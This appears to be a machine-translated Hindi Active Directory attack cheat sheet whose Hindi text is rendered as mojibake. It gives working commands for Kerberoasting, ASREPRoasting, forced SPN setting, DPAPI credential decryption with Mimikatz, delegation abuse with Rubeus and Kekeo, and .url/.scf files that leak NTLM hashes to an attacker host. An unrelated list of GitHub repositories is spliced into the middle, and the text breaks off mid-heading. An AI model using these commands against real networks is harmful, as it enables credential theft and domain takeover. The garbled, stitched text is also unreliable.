рдбреЛрдореЗрди рдХрдВрдкреНрдпреВрдЯрд░ рдкрд░, рдпрджрд┐ рдЖрдкрдХреЗ рдкрд╛рд╕ рд╕рд┐рд╕реНрдЯрдо рдпрд╛ рд╕реНрдерд╛рдиреАрдп рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдХреЗ рд░реВрдк рдореЗрдВ рдХрдорд╛рдВрдб рдирд┐рд╖реНрдкрд╛рджрди рд╣реИ рдФрд░ рдЖрдк рдПрдХ RDP рд╕рддреНрд░ рдЪрд╛рд╣рддреЗ рд╣реИрдВ рдЬрд┐рд╕рдХрд╛ рдЙрдкрдпреЛрдЧ рдХреЛрдИ рдЕрдиреНрдп рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдкрд╣рд▓реЗ рд╕реЗ рдХрд░ рд░рд╣рд╛ рд╣реИ, рддреЛ рдЖрдк рдирд┐рдореНрди рд░рдЬрд┐рд╕реНрдЯреНрд░реА рдХреБрдВрдЬреА рдЬреЛрдбрд╝рдХрд░ рдПрдХрд▓ рд╕рддреНрд░ рдкреНрд░рддрд┐рдмрдВрдз рд╕реЗ рдмрдЪ рд╕рдХрддреЗ рд╣реИрдВ:```powershell
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fSingleSessionPerUser /t REG_DWORD /d 0
рдЬрдм рдЖрдк рд╡рд╛рдВрдЫрд┐рдд рдХрд╛рд░реНрдп рдкреВрд░рд╛ рдХрд░ рд▓реЗрдВ, рддреЛ рдЖрдк рдПрдХрд▓-рд╕рддреНрд░-рдкреНрд░рддрд┐-рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдкреНрд░рддрд┐рдмрдВрдз рдХреЛ рдмрд╣рд╛рд▓ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдХреБрдВрдЬреА рд╣рдЯрд╛ рд╕рдХрддреЗ рд╣реИрдВред```powershell REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fSingleSessionPerUse
root@kitploit:~
### URL рдлрд╝рд╛рдЗрд▓ рд╣рдорд▓реЗ
- .url рдлрд╝рд╛рдЗрд▓ ```
[InternetShortcut]
URL=whatever
WorkingDirectory=whatever
IconFile=\\<AttackersIp>\%USERNAME%.icon
IconIndex=1
* explain-dalibo/pev2 \- рдкреЛрд╕реНрдЯрдЧреНрд░реЗрд╕ рдЗрдВрдЯрд░рдлрд╝реЗрд╕ рдЬреЛ рдирд┐рд╖реНрдкрд╛рджрди рдпреЛрдЬрдирд╛рдУрдВ рдХрд╛ рдореВрд▓реНрдпрд╛рдВрдХрди рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдбрд┐рдЬрд╝рд╛рдЗрди рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИ, рд╕рдВрд╕реНрдХрд░рдг 2 рдкреВрд░реА рддрд░рд╣ рд╕реЗ рдкреБрдирд░реНрд▓рд┐рдЦрд┐рддред
* AppFlowy-IO/AppFlowy \- Notion рдХрд╛ рдУрдкрди рд╕реЛрд░реНрд╕ рд╡рд┐рдХрд▓реНрдк, рдЬреЛ рдбреЗрдЯрд╛ рдирд┐рдпрдВрддреНрд░рдг рдФрд░ рдЕрдиреБрдХреВрд▓рди рдкреНрд░рджрд╛рди рдХрд░рддрд╛ рд╣реИред
* toeverything/AFFiNE \- Notion рдФрд░ Miro рдХрд╛ рдУрдкрди рд╕реЛрд░реНрд╕ рдкреНрд░рддрд┐рд╕реНрдерд╛рдкрди, рдЧреЛрдкрдиреАрдпрддрд╛ рдХреЛ рдкреНрд░рд╛рдердорд┐рдХрддрд╛ рджреЗрддреЗ рд╣реБрдП, рджрд╕реНрддрд╛рд╡реЗрдЬрд╝, рд╡реНрд╣рд╛рдЗрдЯрдмреЛрд░реНрдб рдФрд░ рдбреЗрдЯрд╛рдмреЗрд╕ рдХрд╛ рд╡рд┐рд▓рдп рдкреНрд░рджрд╛рди рдХрд░рддрд╛ рд╣реИред
* intel/intel-one-mono \- рдбреЗрд╡рд▓рдкрд░реНрд╕ рдХреЗ рд▓рд┐рдП рдмрдирд╛рдпрд╛ рдЧрдпрд╛ рдПрдХ рдЕрднрд┐рд╡реНрдпрдВрдЬрдХ рдореЛрдиреЛрд╕реНрдкреЗрд╕ рдлрд╝реЙрдиреНрдЯред
* nicoverbruggen/phpmon \- Mac рдХреЗ рд▓рд┐рдП рд╣рд▓реНрдХрд╛, рдореВрд▓ PHP рдкреНрд░рдмрдВрдзрди рдореЙрдирд┐рдЯрд░ред
* milanm/DevOps-Roadmap \- рдореБрдлрд╝реНрдд рд╢рд┐рдХреНрд╖рдг рд╕рдВрд╕рд╛рдзрдиреЛрдВ рдХреЗ рд╕рд╛рде DevOps рдЗрдВрдЬреАрдирд┐рдпрд░ рдмрдирдиреЗ рдХреЗ рд▓рд┐рдП рдЪрд░рдг-рджрд░-рдЪрд░рдг рдорд╛рд░реНрдЧрджрд░реНрд╢рд┐рдХрд╛ред
* nicbarker/clay \- C рдореЗрдВ рдЙрдЪреНрдЪ рдкреНрд░рджрд░реНрд╢рди UI рд▓реЗрдЖрдЙрдЯ рд▓рд╛рдЗрдмреНрд░реЗрд░реАред
* nicbarker/clay \- C рдореЗрдВ рдЙрдЪреНрдЪ рдкреНрд░рджрд░реНрд╢рди UI рд▓реЗрдЖрдЙрдЯ рд▓рд╛рдЗрдмреНрд░реЗрд░реАред
* mongodb/mongo-go-driver \- MongoDB рдХреЗ рд▓рд┐рдП рдЖрдзрд┐рдХрд╛рд░рд┐рдХ Go рдбреНрд░рд╛рдЗрд╡рд░ред
* milanm/DevOps-Roadmap \- рдореБрдлрд╝реНрдд рд╢рд┐рдХреНрд╖рдг рд╕рдВрд╕рд╛рдзрдиреЛрдВ рдХреЗ рд╕рд╛рде DevOps рдЗрдВрдЬреАрдирд┐рдпрд░ рдмрдирдиреЗ рдХреЗ рд▓рд┐рдП рдЪрд░рдг-рджрд░-рдЪрд░рдг рдорд╛рд░реНрдЧрджрд░реНрд╢рд┐рдХрд╛ред
* mongodb/mongo-go-driver \- MongoDB рдХреЗ рд▓рд┐рдП рдЖрдзрд┐рдХрд╛рд░рд┐рдХ Go рдбреНрд░рд╛рдЗрд╡рд░ред ``` [InternetShortcut] URL=file:///leak/leak.html
root@kitploit:~
* .scf рдлрд╝рд╛рдЗрд▓ ``` [Shell] Command=2 IconFile=\\Share\test.ico [Taskbar] Command=ToggleDesktop
root@kitploit:~
рдЗрди рдлрд╝рд╛рдЗрд▓реЛрдВ рдХреЛ рдПрдХ рд▓рд┐рдЦрдиреЗ рдпреЛрдЧреНрдп рд╢реЗрдпрд░ рдореЗрдВ рд░рдЦрдиреЗ рдкрд░ рдкреАрдбрд╝рд┐рдд рдХреЛ рдХреЗрд╡рд▓ рдлрд╝рд╛рдЗрд▓ рдПрдХреНрд╕рдкреНрд▓реЛрд░рд░ рдЦреЛрд▓рдирд╛ рд╣реЛрддрд╛ рд╣реИ рдФрд░ рд╢реЗрдпрд░ рдкрд░ рдиреЗрд╡рд┐рдЧреЗрдЯ рдХрд░рдирд╛ рд╣реЛрддрд╛ рд╣реИред **рдзреНрдпрд╛рди рджреЗрдВ** рдХрд┐ рдлрд╝рд╛рдЗрд▓ рдХреЛ рдЦреЛрд▓рдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рдирд╣реАрдВ рд╣реИ рдпрд╛ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЛ рдЗрд╕рдХреЗ рд╕рд╛рде рдмрд╛рддрдЪреАрдд рдХрд░рдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рдирд╣реАрдВ рд╣реИ, рд▓реЗрдХрд┐рди рдЗрд╕реЗ рдкреНрд░рд╕реНрддреБрдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдпрд╛ рддреЛ рдлрд╝рд╛рдЗрд▓ рд╕рд┐рд╕реНрдЯрдо рдХреЗ рд╢реАрд░реНрд╖ рдкрд░ рд╣реЛрдирд╛ рдЪрд╛рд╣рд┐рдП рдпрд╛ рд╡рд┐рдВрдбреЛрдЬ рдПрдХреНрд╕рдкреНрд▓реЛрд░рд░ рд╡рд┐рдВрдбреЛ рдореЗрдВ рджрд┐рдЦрд╛рдИ рджреЗрдирд╛ рдЪрд╛рд╣рд┐рдПред рд╣реИрд╢ рдХреИрдкреНрдЪрд░ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рд░рд┐рд╕реНрдкреЙрдиреНрдбрд░ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░реЗрдВред
тЭЧ .scf рдлрд╝рд╛рдЗрд▓ рд╣рдорд▓реЗ рд╡рд┐рдВрдбреЛрдЬ рдХреЗ рдирд╡реАрдирддрдо рд╕рдВрд╕реНрдХрд░рдгреЛрдВ рдкрд░ рдХрд╛рдо рдирд╣реАрдВ рдХрд░реЗрдВрдЧреЗред
### рдЙрдкрдпреЛрдЧреА рдЙрдкрдХрд░рдг
* Powercat рдиреЗрдЯрдХреИрдЯ рдЬреЛ рдкрд╛рд╡рд░рд╢реЗрд▓ рдореЗрдВ рд▓рд┐рдЦрд╛ рдЧрдпрд╛ рд╣реИ, рдФрд░ рдЯрдирд▓рд┐рдВрдЧ, рд░рд┐рд▓реЗ рдФрд░ рдкреЛрд░реНрдЯрдлреЙрд░реНрд╡рд░реНрдб рдХреНрд╖рдорддрд╛рдПрдВ рдкреНрд░рджрд╛рди рдХрд░рддрд╛ рд╣реИред
* SCShell рдлрд╝рд╛рдЗрд▓рд▓реЗрд╕ рд▓реЗрдЯрд░рд▓ рдореВрд╡рдореЗрдВрдЯ рдЯреВрд▓ рдЬреЛ рдХрдорд╛рдВрдб рдЪрд▓рд╛рдиреЗ рдХреЗ рд▓рд┐рдП ChangeServiceConfigA рдкрд░ рдирд┐рд░реНрднрд░ рдХрд░рддрд╛ рд╣реИред
* Evil-Winrm рд╣реИрдХрд┐рдВрдЧ/рдкреЗрдВрдЯреЗрд╕реНрдЯрд┐рдВрдЧ рдХреЗ рд▓рд┐рдП рдЕрдВрддрд┐рдо WinRM рд╢реЗрд▓ред
* RunasCs рд╡рд┐рдВрдбреЛрдЬ рдХреЗ рдмрд┐рд▓реНрдЯ-рдЗрди runas.exe рдХрд╛ Csharp рдФрд░ рдУрдкрди рд╡рд░реНрдЬрд╝рдиред
* ntlm_theft рдпреВрдЖрд░рдПрд▓ рдлрд╝рд╛рдЗрд▓ рд╣рдорд▓реЛрдВ рдХреЗ рд▓рд┐рдП рд╕рднреА рд╕рдВрднрд╛рд╡рд┐рдд рдлрд╝рд╛рдЗрд▓ рдкреНрд░рд╛рд░реВрдк рдмрдирд╛рддрд╛ рд╣реИред
## рдбреЛрдореЗрди рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рд╡реГрджреНрдзрд┐
### Kerberoast
_рдпрд╣ рдХреНрдпрд╛ рд╣реИ?:_
рд╕рднреА рдорд╛рдирдХ рдбреЛрдореЗрди рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рд╕рднреА рд╕реЗрд╡рд╛ рдЦрд╛рддреЛрдВ рдХреА рдПрдХ рдкреНрд░рддрд┐ рдФрд░ рдЙрдирдХреЗ рд╕рдВрдмрдВрдзрд┐рдд рдкрд╛рд╕рд╡рд░реНрдб рд╣реИрд╢ рдХрд╛ рдЕрдиреБрд░реЛрдз рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ, рдЗрд╕рд▓рд┐рдП рд╣рдо рдХрд┐рд╕реА рднреА SPN рдХреЗ рд▓рд┐рдП TGS рдХрд╛ рдЕрдиреБрд░реЛрдз рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдЬреЛ 'рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛' рдЦрд╛рддреЗ рд╕реЗ рдмрдВрдзрд╛ рд╣реИ, рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЗ рдкрд╛рд╕рд╡рд░реНрдб рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдПрдиреНрдХреНрд░рд┐рдкреНрдЯреЗрдб рдмреНрд▓реЙрдм рдХреЛ рдирд┐рдХрд╛рд▓ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ рдСрдлрд╝рд▓рд╛рдЗрди рдЗрд╕реЗ рдмреНрд░реВрдЯрдлреЛрд░реНрд╕ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред
* PowerView: ```powershell #Get User Accounts that are used as Service Accounts Get-NetUser -SPN
#Get every available SPN account, request a TGS and dump its hash Invoke-Kerberoast
#Requesting the TGS for a single account: Request-SPNTicket
#Export all tickets using Mimikatz Invoke-Mimikatz -Command '"kerberos::list /export"'
root@kitploit:~
* AD рдореЙрдбреНрдпреВрд▓: ```powershell #Get User Accounts that are used as Service Accounts Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
root@kitploit:~
* Impacket: ```powershell python GetUserSPNs.py /: -outputfile
root@kitploit:~
* Rubeus: ```powershell #Kerberoasting and outputing on a file with a specific format Rubeus.exe kerberoast /outfile: /domain:
#Kerberoasting whle being "OPSEC" safe, essentially while not try to roast AES enabled accounts Rubeus.exe kerberoast /outfile: /domain: /rc4opsec
#Kerberoast AES enabled accounts Rubeus.exe kerberoast /outfile: /domain: /aes
#Kerberoast specific user account Rubeus.exe kerberoast /outfile: /domain: /user: /simple
#Kerberoast by specifying the authentication credentials Rubeus.exe kerberoast /outfile: /domain: /creduser: /credpassword:
root@kitploit:~
### ASREPRoast
_WUT IS DIS?:_
рдпрджрд┐ рдХрд┐рд╕реА рдбреЛрдореЗрди рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдЦрд╛рддреЗ рдХреЛ рдХреЗрд░реНрдмреЗрд░реЛрд╕ рдкреНрд░реАрдСрдереЗрдВрдЯрд┐рдХреЗрд╢рди рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рдирд╣реАрдВ рд╣реИ, рддреЛ рд╣рдо рдбреЛрдореЗрди рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓ рдХреЗ рдмрд┐рдирд╛ рднреА рдЗрд╕ рдЦрд╛рддреЗ рдХреЗ рд▓рд┐рдП рдПрдХ рд╡реИрдз TGT рдХрд╛ рдЕрдиреБрд░реЛрдз рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ, рдПрдиреНрдХреНрд░рд┐рдкреНрдЯреЗрдб рдмреНрд▓реЙрдм рдХреЛ рдирд┐рдХрд╛рд▓ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ рдЗрд╕реЗ рдСрдлрд▓рд╛рдЗрди рдмреНрд░реВрдЯрдлреЛрд░реНрд╕ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред
* PowerView: `Get-DomainUser -PreauthNotRequired -Verbose`
* AD Module: `Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth`
рдПрдХ рдРрд╕реЗ рдЦрд╛рддреЗ рдкрд░ рдЬрдмрд░рди рдХреЗрд░реНрдмреЗрд░реЛрд╕ рдкреНрд░реАрдСрде рдХреЛ рдЕрдХреНрд╖рдо рдХрд░реЗрдВ рдЬрд┐рд╕ рдкрд░ рдореЗрд░реЗ рдкрд╛рд╕ рд░рд╛рдЗрдЯ рдкрд░рдорд┐рд╢рди рдпрд╛ рдЙрд╕рд╕реЗ рдЕрдзрд┐рдХ рд╣реИ! рдЦрд╛рддреЛрдВ рдкрд░ рджрд┐рд▓рдЪрд╕реНрдк рдЕрдиреБрдорддрд┐рдпреЛрдВ рдХреА рдЬрд╛рдБрдЪ рдХрд░реЗрдВ:
**рд╕рдВрдХреЗрдд:** рд╣рдо рдПрдХ рдлрд╝рд┐рд▓реНрдЯрд░ рдЬреЛрдбрд╝рддреЗ рд╣реИрдВ рдЬреИрд╕реЗ RDPUsers рддрд╛рдХрд┐ "рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдЦрд╛рддреЗ" рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ, рдорд╢реАрди рдЦрд╛рддреЗ рдирд╣реАрдВ, рдХреНрдпреЛрдВрдХрд┐ рдорд╢реАрди рдЦрд╛рддрд╛ рд╣реИрд╢ рдХреНрд░реИрдХ рдХрд░рдиреЗ рдпреЛрдЧреНрдп рдирд╣реАрдВ рд╣реЛрддреЗ!
PowerView:```powershell Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentinyReferenceName -match "RDPUsers"} Disable Kerberos Preauth: Set-DomainObject -Identity -XOR @{useraccountcontrol=4194304} -Verbose Check if the value changed: Get-DomainUser -PreauthNotRequired -Verbose
root@kitploit:~
- рдФрд░ рдЕрдВрдд рдореЗрдВ [ASREPRoast](https://github.com/HarmJ0y/ASREPRoast) рдЯреВрд▓ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рд╣рдорд▓рд╛ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░реЗрдВред ```powershell
#Get a specific Accounts hash:
Get-ASREPHash -UserName <UserName> -Verbose
#Get any ASREPRoastable Users hashes:
Invoke-ASREPRoast -Verbose
* Rubeus рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдирд╛: ```powershell #Trying the attack for all domain users Rubeus.exe asreproast /format:<hashcat|john> /domain: /outfile:
#ASREPRoast specific user Rubeus.exe asreproast /user: /format:<hashcat|john> /domain: /outfile:
#ASREPRoast users of a specific OU (Organization Unit) Rubeus.exe asreproast /ou: /format:<hashcat|john> /domain: /outfile:
root@kitploit:~
* Impacket рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддреЗ рд╣реБрдП: ```powershell #Trying the attack for the specified users on the file python GetNPUsers.py <domain_name>/ -usersfile <users_file> -outputfile
root@kitploit:~
### Password Spray рд╣рдорд▓рд╛
рдпрджрд┐ рд╣рдордиреЗ рдХрд┐рд╕реА рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдЦрд╛рддреЗ рд╕реЗ рд╕рдордЭреМрддрд╛ рдХрд░рдХреЗ рдХреБрдЫ рдкрд╛рд╕рд╡рд░реНрдб рдкреНрд░рд╛рдкреНрдд рдХрд┐рдП рд╣реИрдВ, рддреЛ рд╣рдо рдЗрд╕ рд╡рд┐рдзрд┐ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдЕрдиреНрдп рдбреЛрдореЗрди рдЦрд╛рддреЛрдВ рдкрд░ рдкрд╛рд╕рд╡рд░реНрдб рдкреБрди: рдЙрдкрдпреЛрдЧ рдХрд╛ рд╢реЛрд╖рдг рдХрд░рдиреЗ рдХрд╛ рдкреНрд░рдпрд╛рд╕ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред
**Tools:**
* DomainPasswordSpray
* CrackMapExec
* Invoke-CleverSpray
* Spray
### рдмрд▓рдкреВрд░реНрд╡рдХ SPN рд╕реЗрдЯ рдХрд░рдирд╛
_рдпрд╣ рдХреНрдпрд╛ рд╣реИ?: рдпрджрд┐ рд╣рдорд╛рд░реЗ рдкрд╛рд╕ рдкрд░реНрдпрд╛рдкреНрдд рдЕрдиреБрдорддрд┐рдпрд╛рдБ рд╣реИрдВ - > GenericAll/GenericWrite, рддреЛ рд╣рдо рд▓рдХреНрд╖реНрдп рдЦрд╛рддреЗ рдкрд░ рдПрдХ SPN рд╕реЗрдЯ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ, рдПрдХ TGS рдХрд╛ рдЕрдиреБрд░реЛрдз рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ, рдлрд┐рд░ рдЙрд╕рдХрд╛ рдмреНрд▓реЙрдм рдкреНрд░рд╛рдкреНрдд рдХрд░рдХреЗ рдмреНрд░реВрдЯрдлреЛрд░реНрд╕ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред_
* PowerView: ```powershell #Check for interesting permissions on accounts: Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentinyReferenceName -match "RDPUsers"}
#Check if current user has already an SPN setted: Get-DomainUser -Identity | select serviceprincipalname
#Force set the SPN on the account: Set-DomainObject -Set @{serviceprincipalname='ops/whatever1'}
root@kitploit:~
* AD рдореЙрдбреНрдпреВрд▓: ```powershell #Check if current user has already an SPN setted Get-ADUser -Identity -Properties ServicePrincipalName | select ServicePrincipalName
#Force set the SPN on the account: Set-ADUser -Identiny -ServicePrincipalNames @{Add='ops/whatever1'}
root@kitploit:~
рдЕрдВрдд рдореЗрдВ рд╣реИрд╢ рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдФрд░ рдЙрд╕реЗ kerberoast рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдкрд╣рд▓реЗ рдХреЗ рдХрд┐рд╕реА рднреА рдЙрдкрдХрд░рдг рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░реЗрдВред
### рд╢реИрдбреЛ рдХреЙрдкреАрдЬрд╝ рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ
рдпрджрд┐ рдЖрдкрдХреЗ рдкрд╛рд╕ рдХрд┐рд╕реА рдорд╢реАрди рдкрд░ рд╕реНрдерд╛рдиреАрдп рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдкрд╣реБрдВрдЪ рд╣реИ, рддреЛ рд╢реИрдбреЛ рдХреЙрдкреАрдЬрд╝ рдХреЛ рд╕реВрдЪреАрдмрджреНрдз рдХрд░рдиреЗ рдХрд╛ рдкреНрд░рдпрд╛рд╕ рдХрд░реЗрдВ, рдпрд╣ рдбреЛрдореЗрди рдПрд╕реНрдХреЗрд▓реЗрд╢рди рдХрд╛ рдПрдХ рдЖрд╕рд╛рди рддрд░реАрдХрд╛ рд╣реИред```powershell #List shadow copies using vssadmin (Needs Admnistrator Access) vssadmin list shadows
#List shadow copies using diskshadow diskshadow list shadows all
#Make a symlink to the shadow copy and access it mklink /d c:\shadowcopy \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\
root@kitploit:~
1. рдЖрдк рдмреИрдХрдЕрдк рдХреА рдЧрдИ SAM рдбреЗрдЯрд╛рдмреЗрд╕ рдХреЛ рдбрдВрдк рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рдкреНрд░рд╛рдкреНрдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред
2. DPAPI рдореЗрдВ рд╕рдВрдЧреНрд░рд╣реАрдд рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рдЦреЛрдЬреЗрдВ рдФрд░ рдЙрдиреНрд╣реЗрдВ рдбрд┐рдХреНрд░рд┐рдкреНрдЯ рдХрд░реЗрдВред
3. рдмреИрдХрдЕрдк рдХреА рдЧрдИ рд╕рдВрд╡реЗрджрдирд╢реАрд▓ рдлрд╝рд╛рдЗрд▓реЛрдВ рддрдХ рдкрд╣реБрдБрдЪ рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВред
### Mimikatz рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рд╕рдВрдЧреНрд░рд╣реАрдд рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рдХреА рд╕реВрдЪреА рдмрдирд╛рдПрдВ рдФрд░ рдбрд┐рдХреНрд░рд┐рдкреНрдЯ рдХрд░реЗрдВ
рд╕рд╛рдорд╛рдиреНрдпрддрдГ рдПрдиреНрдХреНрд░рд┐рдкреНрдЯреЗрдб рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рдЗрдирдореЗрдВ рд╕рдВрдЧреНрд░рд╣реАрдд рд╣реЛрддреЗ рд╣реИрдВ:
- `%appdata%\Microsoft\Credentials`
- `%localappdata%\Microsoft\Credentials````powershell
#By using the cred function of mimikatz we can enumerate the cred object and get information about it:
dpapi::cred /in:"%appdata%\Microsoft\Credentials\<CredHash>"
#From the previous command we are interested to the "guidMasterKey" parameter, that tells us which masterkey was used to encrypt the credential
#Lets enumerate the Master Key:
dpapi::masterkey /in:"%appdata%\Microsoft\Protect\<usersid>\<MasterKeyGUID>"
#Now if we are on the context of the user (or system) that the credential belogs to, we can use the /rpc flag to pass the decryption of the masterkey to the domain controler:
dpapi::masterkey /in:"%appdata%\Microsoft\Protect\<usersid>\<MasterKeyGUID>" /rpc
#We now have the masterkey in our local cache:
dpapi::cache
#Finally we can decrypt the credential using the cached masterkey:
dpapi::cred /in:"%appdata%\Microsoft\Credentials\<CredHash>"
Detailed Article: DPAPI all the things
### рдЕрдкреНрд░рддрд┐рдмрдВрдзрд┐рдд рдкреНрд░рддреНрдпрд╛рдпреЛрдЬрди
_рдпрд╣ рдХреНрдпрд╛ рд╣реИ?: рдпрджрд┐ рд╣рдорд╛рд░реЗ рдкрд╛рд╕ рдПрдХ рдорд╢реАрди рдкрд░ рдкреНрд░рд╢рд╛рд╕рдирд┐рдХ рдкрд╣реБрдВрдЪ рд╣реИ рдЬрд┐рд╕рдореЗрдВ рдЕрдкреНрд░рддрд┐рдмрдВрдзрд┐рдд рдкреНрд░рддреНрдпрд╛рдпреЛрдЬрди рд╕рдХреНрд╖рдо рд╣реИ, рддреЛ рд╣рдо рдХрд┐рд╕реА рдЙрдЪреНрдЪ-рдореВрд▓реНрдп рд▓рдХреНрд╖реНрдп рдпрд╛ DA рдХреЗ рдЙрд╕рд╕реЗ рдХрдиреЗрдХреНрдЯ рд╣реЛрдиреЗ рдХреА рдкреНрд░рддреАрдХреНрд╖рд╛ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ, рдЙрд╕рдХрд╛ TGT рдЪреБрд░рд╛ рд╕рдХрддреЗ рд╣реИрдВ, рдлрд┐рд░ ptt рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ рдЙрд╕рдХрд╛ рд░реВрдк рдзрд╛рд░рдг рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ!_
PowerView рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддреЗ рд╣реБрдП:```powershell #Discover domain joined computers that have Unconstrained Delegation enabled Get-NetComputer -UnConstrained
#List tickets and check if a DA or some High Value target has stored its TGT Invoke-Mimikatz -Command '"sekurlsa::tickets"'
#Command to monitor any incoming sessions on our compromised server Invoke-UserHunter -ComputerName -Poll -UserName -Delay -Verbose
#Dump the tickets to disk: Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'
#Impersonate the user using ptt attack: Invoke-Mimikatz -Command '"kerberos::ptt "'
root@kitploit:~
**рдиреЛрдЯ:** рд╣рдо Rubeus рдХрд╛ рднреА рдЙрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ!
### Constrained Delegation
PowerView рдФрд░ Kekeo рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ:```powershell
#Enumerate Users and Computers with constrained delegation
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth
#If we have a user that has Constrained delegation, we ask for a valid tgt of this user using kekeo
tgt::ask /user:<UserName> /domain:<Domain's FQDN> /rc4:<hashedPasswordOfTheUser>
#Then using the TGT we have ask a TGS for a Service this user has Access to through constrained delegation
tgs::s4u /tgt:<PathToTGT> /user:<UserToImpersonate>@<Domain's FQDN> /service:<Service's SPN>
#Finally use mimikatz to ptt the TGS
Invoke-Mimikatz -Command '"kerberos::ptt <PathToTGS>"'
_рд╡реИрдХрд▓реНрдкрд┐рдХ:_ Rubeus рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ:```powershell Rubeus.exe s4u /user: /rc4: /impersonateuser: /msdsspn:"<Service's SPN>" /altservice: /ptt
root@kitploit:~
рдЕрдм рд╣рдо рдкреНрд░рддрд┐рд░реВрдкрд┐рдд рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЗ рд░реВрдк рдореЗрдВ рд╕реЗрд╡рд╛ рддрдХ рдкрд╣реБрдБрдЪ рд╕рдХрддреЗ рд╣реИрдВ!
:triangular_flag_on_post: **рдпрджрд┐ рд╣рдорд╛рд░реЗ рдкрд╛рд╕ рдХреЗрд╡рд▓ рдПрдХ рд╡рд┐рд╢рд┐рд╖реНрдЯ SPN (рдЬреИрд╕реЗ TIME) рдХреЗ рд▓рд┐рдП рдкреНрд░рддрд┐рдирд┐рдзрд┐рдордВрдбрд▓ рдЕрдзрд┐рдХрд╛рд░ рд╣реИрдВ рддреЛ рдХреНрдпрд╛ рд╣реЛрдЧрд╛:**
